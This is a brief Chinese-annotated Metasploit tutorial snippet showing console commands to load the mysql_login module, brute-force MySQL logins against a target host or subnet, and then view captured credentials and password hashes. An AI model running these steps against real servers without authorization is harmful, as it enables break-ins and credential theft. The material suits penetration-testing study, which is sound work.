msf > search mysql_login (搜索mysql_login模块(针对mysql进行暴力破解))

msf > use xxxxx/mysql_login (使用该模块)
msf > show options (查看模块配置)
msf > set RHOSTS xxx.xxx.xxx.xxx 或xxx.xxx.xxx.0/24 (指定目标)
msf > run / exploit (运行模块)
msf > creds (查看数据)
msf > loot (查看hash数据)
网友评论